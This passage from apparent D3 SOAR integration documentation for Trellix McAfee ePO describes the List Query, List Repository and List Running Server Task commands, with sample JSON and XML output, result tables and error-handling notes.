06-05T16:38:21-07:00\\\",\\r\\n\\t\\t\\t\\\"2019-06-05T16:38:21-07:00\\\",\\r\\n\\t\\t\\t\\\"2019-06-05T16:38:21-07:00\\\",\\r\\n\\t\\t\\t\\\"2019-06-05T16:38:21-07:00\\\",\\r\\n\\t\\t\\t\\\"2019-06-05T16:38:21-07:00\\\",\\r\\n\\t\\t\\t\\\"2019-06-05T16:38:21-07:00\\\",\\r\\n\\t\\t\\t\\\"2019-06-05T16:38:22-07:00\\\",\\r\\n\\t\\t\\t\\\"2019-06-05T16:38:22-07:00\\\",\\r\\n\\t\\t\\t\\\"2019-06-05T16:38:22-07:00\\\",\\r\\n\\t\\t\\t\\\"2019-06-05T16:38:22-07:00\\\",\\r\\n\\t\\t\\t\\\"2019-06-05T16:38:22-07:00\\\",\\r\\n\\t\\t\\t\\\"2019-06-04T12:20:34-07:00\\\",\\r\\n\\t\\t\\t\\\"2019-06-04T12:20:34-07:00\\\",\\r\\n\\t\\t\\t\\\"2019-06-04T12:20:34-07:00\\\",\\r\\n\\t\\t\\t\\\"2019-06-04T12:20:35-07:00\\\",\\r\\n\\t\\t\\t\\\"2019-06-04T12:20:35-07:00\\\",\\r\\n\\t\\t\\t\\\"2019-06-04T11:48:13-07:00\\\",\\r\\n\\t\\t\\t\\\"2019-06-04T12:20:35-07:00\\\",\\r\\n\\t\\t\\t\\\"2019-06-04T12:20:36-07:00\\\",\\r\\n\\t\\t\\t\\\"2019-06-04T12:20:36-07:00\\\",\\r\\n\\t\\t\\t\\\"2019-06-04T12:20:36-07:00\\\",\\r\\n\\t\\t\\t\\\"2019-06-04T12:20:36-07:00\\\",\\r\\n\\t\\t\\t\\\"2019-06-05T16:38:18-07:00\\\",\\r\\n\\t\\t\\t\\\"2019-06-05T16:38:18-07:00\\\",\\r\\n\\t\\t\\t\\\"2019-06-05T16:38:19-07:00\\\",\\r\\n\\t\\t\\t\\\"2019-06-05T16:38:19-07:00\\\",\\r\\n\\t\\t\\t\\\"2019-06-05T16:38:19-07:00\\\",\\r\\n\\t\\t\\t\\\"2019-06-05T16:38:19-07:00\\\",\\r\\n\\t\\t\\t\\\"2019-06-05T16:38:19-07:00\\\",\\r\\n\\t\\t\\t\\\"2019-06-05T16:38:19-07:00\\\",\\r\\n\\t\\t\\t\\\"2019-06-05T16:38:19-07:00\\\",\\r\\n\\t\\t\\t\\\"2019-06-05T16:38:19-07:00\\\",\\r\\n\\t\\t\\t\\\"2019-06-05T16:38:19-07:00\\\",\\r\\n\\t\\t\\t\\\"2019-06-05T16:38:19-07:00\\\",\\r\\n\\t\\t\\t\\\"2019-10-29T15:12:23-07:00\\\",\\r\\n\\t\\t\\t\\\"2019-10-29T15:12:23-07:00\\\",\\r\\n\\t\\t\\t\\\"2019-11-21T14:55:39-08:00\\\",\\r\\n\\t\\t\\t\\\"2019-11-21T14:55:39-08:00\\\",\\r\\n\\t\\t\\t\\\"2019-11-21T14:55:40-08:00\\\",\\r\\n\\t\\t\\t\\\"2019-11-21T14:55:40-08:00\\\",\\r\\n\\t\\t\\t\\\"2019-11-21T14:55:41-08:00\\\",\\r\\n\\t\\t\\t\\\"2019-11-21T14:55:41-08:00\\\"\\r\\n\\t\\t]\"",
    "modifiedBy": "\"[\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\",\\r\\n\\t\\t\\t\\\"admin\\\"\\r\\n\\t\\t]\"",
    "modifiedOn": "\"[\\r\\n\\t\\t\\t\\\"2018-02-14T13:00:39-08:00\\\",\\r\\n\\t\\t\\t\\\"2018-02-14T13:00:41-08:00\\\",\\r\\n\\t\\t\\t\\\"2018-02-14T13:00:41-08:00\\\",\\r\\n\\t\\t\\t\\\"2018-02-14T13:04:19-08:00\\\",\\r\\n\\t\\t\\t\\\"2018-02-14T13:04:19-08:00\\\",\\r\\n\\t\\t\\t\\\"2019-05-23T20:54:41-07:00\\\",\\r\\n\\t\\t\\t\\\"2018-02-14T13:04:20-08:00\\\",\\r\\n\\t\\t\\t\\\"2019-05-23T20:54:40-07:00\\\",\\r\\n\\t\\t\\t\\\"2019-05-23T20:54:40-07:00\\\",\\r\\n\\t\\t\\t\\\"2019-05-23T20:54:40-07:00\\\",\\r\\n\\t\\t\\t\\\"2019-05-23T20:54:40-07:00\\\",\\r\\n\\t\\t\\t\\\"2018-02-14T13:04:20-08:00\\\",\\r\\n\\t\\t\\t\\\"2019-05-23T20:54:40-07:00\\\",\\r\\n\\t\\t\\t\\\"2019-05-23T20:54:40-07:00\\\",\\r\\n\\t\\t\\t\\\"2018-02-14T13:04:20-08:00\\\"\\r\\n\\t\\t]\""
}
Return Data

Indicates one of the possible command execution states: Successful or Failed.

The Failed state can be triggered by any of the following errors:

  • A connection issue with the integration

  • The API returned an error message

  • No response from the API

You can view more details about an error in the Error tab.

Return Data can be passed down directly to a subsequent command or used to create conditional tasks in playbooks.

SAMPLE DATA

CODE
Successful
Result

Provides a brief summary of outputs in an HTML formatted table.

SAMPLE DATA

ID

NAME

DESCRIPTION

CONDITIONSEXP

GROUPNAME

USERNAME

DATABASETYPE

TARGET

CREATEDBY

CREATEDON

MODIFIEDBY

MODIFIEDON

1

Effective permissions for users

Shows all permissions for each user

Permission Does not equal ";%%NOEPOROLES%%";

Permissions

Public

EntitlementView

admin

2/14/2018 1:00:39 PM

admin

2/14/2018 1:00:39 PM

2

Permission set details

Shows the permissions associated with each permission set

Permissions

Public

EntitlementView

admin

2/14/2018 1:00:41 PM

admin

2/14/2018 1:00:41 PM

3

Permission set membership

Shows the permission sets associated with each principal

Permissions

Public

EntitlementView

admin

2/14/2018 1:00:41 PM

admin

2/14/2018 1:00:41 PM

4

Failed User Actions in ePO Console within Last 30 Days

Displays a table of all failed actions within the last 30 days from the Audit Log.

(Success Equals False and Start Time Is within the last 1 Months)

User Auditing

Public

OrionAuditLog

admin

2/14/2018 1:04:19 PM

admin

2/14/2018 1:04:19 PM

5

Today's Detections per Product

Displays a pie chart of detections within the last 24 hours organized by detecting product.

(Event Generated Time Is within the last 1 Days and Event Category Does not belong to Operational)

Detections and Compliance

Public

EPOEvents

admin

2/14/2018 1:04:19 PM

admin

2/14/2018 1:04:19 PM

6

Systems per Top-Level Group

Displays a bar chart of your managed systems organized by top-level System Tree group.

Managed State Equals Managed

System Management

Public

EPOLeafNode

admin

5/23/2019 8:54:41 PM

admin

5/23/2019 8:54:41 PM

7

Duplicate Systems Names

Lists all system names that appear in multiple System Tree locations.

System Name Is duplicated

System Management

Public

EPOLeafNode

admin

2/14/2018 1:04:20 PM

admin

2/14/2018 1:04:20 PM

8

McAfee Agent Compliance Summary

Displays a Boolean pie chart of managed systems in your environment which are compliant or noncompliant by version of McAfee Agent.

Last Communication Is within the last 1 Days

Detections and Compliance

Public

EPOLeafNode

admin

5/23/2019 8:54:40 PM

admin

5/23/2019 8:54:40 PM

Error Handling

If the Return Data is Failed, an Error tab will appear in the Test Result window.

The error tab contains the details responded from D3 SOAR or third-party API calls, including Failure Indicator, Status Code, and Message. This can help you locate the root cause of a command failure.

Parts in Error

Description

Example

Failure Indicator

Indicates the command failure that happened at a specific input and/or API call.

List Query failed.

Status Code

The response code issued by the third-party API server or the D3 SOAR system that can be used to locate the corresponding error category. For example, if the returned status code is 401, the selected connection is unauthorized to run the command. The user or system support would need to check the permission setting in the Trellix McAfee ePO portal. Refer to the HTTP Status Code Registry for details.

Status Code: 401.

Message

The raw data or captured key error message from the integration API server about the API request failure.

Message: Unauthorized.

Error Sample Data

List Query failed.

Status Code: 401.

Message: Unauthorized.

List Repository

Retrieves a list of all repositories.

Input

N/A

Output

Raw Data

The primary response data from the API request.

SAMPLE DATA

JSON
[
    {
        "SAServerDNS": "",
        "disableV1DATReplication": false,
        "spipeServerDNS": null,
        "repositoryTypeString": "master",
        "useAnonCreds": false,
        "downloadCredPassword": "",
        "downloadCredDomain": "",
        "lockType": 0,
        "enabled": true,
        "uncUseLoggedOnUser": false,
        "uncOrder": "1",
        "protocol": 1,
        "lockedBy": "",
        "softwareInclusionList": [],
        "uploadCredUsername": "",
        "spipeVersion": "4.5.0",
        "SAServerNetbios": "",
        "protocolString": "SpipeSite",
        "disableFullDATReplication": false,
        "replicationUNC": "",
        "SAServerIP": "",
        "addressType": null,
        "autoID": 3,
        "softwareExclusionList": null,
        "repositoryTypeAsString": null,
        "repositoryName": "*****-AD",
        "spipeServerName": "*****-AD",
        "uploadCredDomain": "",
        "repositoryPort": *****,
        "downloadPasswordEncrypted": true,
        "httpUseAuth": false,
        "downloadCredUsername": "",
        "includeAllSoftware": true,
        "repositoryId": "*****-AD",
        "repositoryType": 2,
        "location": "D3Lab-AD/Software",
        "updateExclusionList": true,
        "spipeServerIP": "1.1.1.1",
        "uploadCredPassword": "",
        "fallback": false,
        "repliPasswordEncrypted": true
    }
]
Context Data

The data extracted from Raw Data converted into JSON format. Context Data may be identical to Raw Data in some cases.

It is recommended to refer to the Raw Data instead of Context Data, since it contains the complete API response data. D3 will deprecate Context Data in the future, and playbook tasks using Context Data will be replaced with Raw Data.

SAMPLE DATA

CODE
[
    {
        "SAServerDNS": "",
        "disableV1DATReplication": false,
        "spipeServerDNS": null,
        "repositoryTypeString": "master",
        "useAnonCreds": false,
        "downloadCredPassword": "",
        "downloadCredDomain": "",
        "lockType": 0,
        "enabled": true,
        "uncUseLoggedOnUser": false,
        "uncOrder": "1",
        "protocol": 1,
        "lockedBy": "",
        "softwareInclusionList": [],
        "uploadCredUsername": "",
        "spipeVersion": "4.5.0",
        "SAServerNetbios": "",
        "protocolString": "SpipeSite",
        "disableFullDATReplication": false,
        "replicationUNC": "",
        "SAServerIP": "",
        "addressType": null,
        "autoID": 3,
        "softwareExclusionList": null,
        "repositoryTypeAsString": null,
        "repositoryName": "*****-AD",
        "spipeServerName": "*****-AD",
        "uploadCredDomain": "",
        "repositoryPort": 80,
        "downloadPasswordEncrypted": true,
        "httpUseAuth": false,
        "downloadCredUsername": "",
        "includeAllSoftware": true,
        "repositoryId": "*****-AD",
        "repositoryType": 2,
        "location": "D3Lab-AD/Software",
        "updateExclusionList": true,
        "spipeServerIP": "1.1.1.1",
        "uploadCredPassword": "",
        "fallback": false,
        "repliPasswordEncrypted": true
    }
]
Key Fields

Common cyber security indicators such as unique IDs, file hash values, CVE numbers, IP addresses, etc., will be extracted from Raw Data as Key Fields.
The system stores these key fields in the path $.[playbookTask].outputData. You can use these key-value pairs as data points for playbook task inputs.

SAMPLE DATA

CODE
{
    "Output": "\"[\\r\\n    {\\r\\n        \\\"SAServerDNS\\\": \\\"\\\",\\r\\n        \\\"disableV1DATReplication\\\": false,\\r\\n        \\\"spipeServerDNS\\\": null,\\r\\n        \\\"repositoryTypeString\\\": \\\"master\\\",\\r\\n        \\\"useAnonCreds\\\": false,\\r\\n        \\\"downloadCredPassword\\\": \\\"\\\",\\r\\n        \\\"downloadCredDomain\\\": \\\"\\\",\\r\\n        \\\"lockType\\\": 0,\\r\\n        \\\"enabled\\\": true,\\r\\n        \\\"uncUseLoggedOnUser\\\": false,\\r\\n        \\\"uncOrder\\\": \\\"1\\\",\\r\\n        \\\"protocol\\\": 1,\\r\\n        \\\"lockedBy\\\": \\\"\\\",\\r\\n        \\\"softwareInclusionList\\\": [],\\r\\n        \\\"uploadCredUsername\\\": \\\"\\\",\\r\\n        \\\"spipeVersion\\\": \\\"4.5.0\\\",\\r\\n        \\\"SAServerNetbios\\\": \\\"\\\",\\r\\n        \\\"protocolString\\\": \\\"SpipeSite\\\",\\r\\n        \\\"disableFullDATReplication\\\": false,\\r\\n        \\\"replicationUNC\\\": \\\"\\\",\\r\\n        \\\"SAServerIP\\\": \\\"\\\",\\r\\n        \\\"addressType\\\": null,\\r\\n        \\\"autoID\\\": 3,\\r\\n        \\\"softwareExclusionList\\\": null,\\r\\n        \\\"repositoryTypeAsString\\\": null,\\r\\n        \\\"repositoryName\\\": \\\"ePO_McAfeeEPO510\\\",\\r\\n        \\\"spipeServerName\\\": \\\"McAfeeEPO510\\\",\\r\\n        \\\"uploadCredDomain\\\": \\\"\\\",\\r\\n        \\\"repositoryPort\\\": 80,\\r\\n        \\\"downloadPasswordEncrypted\\\": true,\\r\\n        \\\"httpUseAuth\\\": false,\\r\\n        \\\"downloadCredUsername\\\": \\\"\\\",\\r\\n        \\\"includeAllSoftware\\\": true,\\r\\n        \\\"repositoryId\\\": \\\"ePO_McAfeeEPO510\\\",\\r\\n        \\\"repositoryType\\\": 2,\\r\\n        \\\"location\\\": \\\"McAfeeEPO510/Software\\\",\\r\\n        \\\"updateExclusionList\\\": true,\\r\\n        \\\"spipeServerIP\\\": \\\"192.168.87.109\\\",\\r\\n        \\\"uploadCredPassword\\\": \\\"\\\",\\r\\n        \\\"fallback\\\": false,\\r\\n        \\\"repliPasswordEncrypted\\\": true\\r\\n    }\\r\\n]\"",
    "disableV1DATReplication": "\"[\\r\\n \\r\\n  false\\r\\n \\r\\n ]\"",
    "location": "\"[\\r\\n \\r\\n  \\\"*****-AD/Software\\\"\\r\\n \\r\\n ]\"",
    "protocolString": "\"[\\r\\n \\r\\n  \\\"SpipeSite\\\"\\r\\n \\r\\n ]\"",
    "repositoryId": "\"[\\r\\n \\r\\n  \\\"*****-AD\\\"\\r\\n \\r\\n ]\"",
    "repositoryName": "\"[\\r\\n \\r\\n  \\\"*****-AD\\\"\\r\\n \\r\\n ]\"",
    "repositoryPort": "\"[\\r\\n \\r\\n  80\\r\\n \\r\\n ]\"",
    "repositoryType": "\"[\\r\\n \\r\\n  2\\r\\n \\r\\n ]\"",
    "spipeServerIP": "\"[\\r\\n \\r\\n  \\\"1.1.1.1\\\"\\r\\n \\r\\n ]\"",
    "spipeServerName": "\"[\\r\\n \\r\\n  \\\"*****-AD\\\"\\r\\n \\r\\n ]\"",
    "spipeVersion": "\"\\\"4.5.0\\\"\\r\\n \\r\\n ]\""
}
Return Data

Indicates one of the possible command execution states: Successful or Failed.

The Failed state can be triggered by any of the following errors:

  • A connection issue with the integration

  • The API returned an error message

  • No response from the API

You can view more details about an error in the Error tab.

Return Data can be passed down directly to a subsequent command or used to create conditional tasks in playbooks.

SAMPLE DATA

CODE
Successful
Result

Provides a brief summary of outputs in an HTML formatted table.

SAMPLE DATA

SAServerDNS

disableV1DATReplication

spipeServerDNS

repositoryTypeString

useAnonCreds

downloadCredPassword

downloadCredDomain

lockType

enabled

uncUseLoggedOnUser

uncOrder

protocol

lockedBy

softwareInclusionList

uploadCredUsername

spipeVersion

SAServerNetbios

protocolString

disableFullDATReplication

replicationUNC

SAServerIP

addressType

autoID

softwareExclusionList

repositoryTypeAsString

repositoryName

spipeServerName

uploadCredDomain

repositoryPort

downloadPasswordEncrypted

httpUseAuth

downloadCredUsername

includeAllSoftware

repositoryId

repositoryType

location

updateExclusionList

spipeServerIP

uploadCredPassword

fallback

repliPasswordEncrypted

False

master

False

0

True

False

1

1

[]

4.5.0

SpipeSite

False

3

***-AD

***-AD

80

True

False

True

***-AD

2

***-AD/Software

True

1.1.1.1

False

Tru

Error Handling

If the Return Data is Failed, an Error tab will appear in the Test Result window.

The error tab contains the details responded from D3 SOAR or third-party API calls, including Failure Indicator, Status Code, and Message. This can help you locate the root cause of a command failure.

Parts in Error

Description

Example

Failure Indicator

Indicates the command failure that happened at a specific input and/or API call.

List Repository failed.

Status Code

The response code issued by the third-party API server or the D3 SOAR system that can be used to locate the corresponding error category. For example, if the returned status code is 401, the selected connection is unauthorized to run the command. The user or system support would need to check the permission setting in the Trellix McAfee ePO portal. Refer to the HTTP Status Code Registry for details.

Status Code: 401.

Message

The raw data or captured key error message from the integration API server about the API request failure.

Message: Unauthorized.

Error Sample Data

List Repository failed.

Status Code: 401.

Message: Unauthorized.

List Running Server Task

Retrieves a list of running server tasks.

Input

N/A

Output

Raw Data

The primary response data from the API request.

SAMPLE DATA

JSON
"<list id=""1"">  <permissionSet id=""2"">
		    <name>Group Admin</name>
		    <roles>
		      <role>
		        <roleUri>role:repoRole.masterViewOnly</roleUri>
		      </role>
		      <role>
		        <roleUri>role:epo.core.view.tree</roleUri>
		      </role>
		      <role>
		        <roleUri>role:core.addressbook.admin</roleUri>
		      </role>
		      <role>
		        <roleUri>role:core.dash.user</roleUri>
		      </role>
		      <role>
		        <roleUri>role:epo.core.modify.tree</roleUri>
		      </role>
		      <role>
		        <roleUri>role:response.rule.admin</roleUri>
		      </role>
		      <role>
		        <roleUri>role:epo.productevents.view</roleUri>
		      </role>
		      <role>
